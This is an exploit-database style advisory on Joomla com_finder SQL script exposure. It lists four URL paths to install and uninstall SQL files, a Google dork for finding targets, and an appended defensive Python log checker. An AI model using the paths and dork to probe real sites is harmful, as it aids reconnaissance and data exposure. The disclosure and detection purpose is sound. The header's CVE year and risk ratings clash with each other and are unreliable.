CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-37904 | CWE-264 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
ExploitAlert Team | High | Remote | 2018-11-22 |
#################################################################################################

# Exploit Title : Joomla com_finder Components Database Backup Arbitrary File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/11/2018
# Vendor Homepage : joomla.org
# Tested On : Windows and Linux
# Software Download Link : github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql
# Category : WebApps
# Google Dorks : inurl:''/administrator/components/com_finder/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : /administrator

# Exploit :

/administrator/components/com_finder/sql/install.mysql.sql
/administrator/components/com_finder/sql/install.postgresql.sql
/administrator/components/com_finder/sql/uninstall.mysql.sql
/administrator/components/com_finder/sql/uninstall.postgresql.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
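Added example (not part of the original advisory): a log check a site owner can run to see whether the four com_finder SQL script paths listed in the advisory were requested on their own server, and whether the server returned the file. The combined access-log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# The four SQL script paths named in the advisory, under any site prefix.
SQL_PATH = re.compile(
    r"/administrator/components/com_finder/sql/"
    r"(?:un)?install\.(?:mysql|postgresql)\.sql$",
    re.IGNORECASE,
)

# Assumption: Apache/nginx "combined" access-log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Nov/2018:10:01:02 +0000] "GET /administrator/components/com_finder/sql/install.mysql.sql HTTP/1.1" 200 5120 "-" "curl/7.61.0"',
    '203.0.113.7 - - [22/Nov/2018:10:01:03 +0000] "GET /joomla/administrator/components/com_finder/sql/uninstall.postgresql.sql?x=1 HTTP/1.1" 403 199 "-" "curl/7.61.0"',
    '198.51.100.4 - - [22/Nov/2018:10:02:00 +0000] "GET /index.php?option=com_finder HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Nov/2018:10:03:00 +0000] "GET /administrator/components/com_finder/sql/install%2Emysql%2Esql HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def find_sql_script_requests(lines):
    """Map client IP -> [(timestamp, decoded path, status, body_served)]."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        # Drop the query string, then decode %xx so encoded dots still match.
        path = unquote(m["target"].split("?", 1)[0])
        if not SQL_PATH.search(path):
            continue
        status = int(m["status"])
        # 200/206 mean the server sent file content; 403/404 mean it did not.
        hits[m["ip"]].append((m["ts"], path, status, status in (200, 206)))
    return dict(hits)

if __name__ == "__main__":
    for ip, rows in find_sql_script_requests(SAMPLE_LOG).items():
        for ts, path, status, served in rows:
            print(f"{ip} {ts} {status} {'SERVED' if served else 'blocked'} {path}")
```

A SERVED result means the web server hands these files to unauthenticated clients; denying direct web access to `.sql` files under `/administrator/components/` stops that.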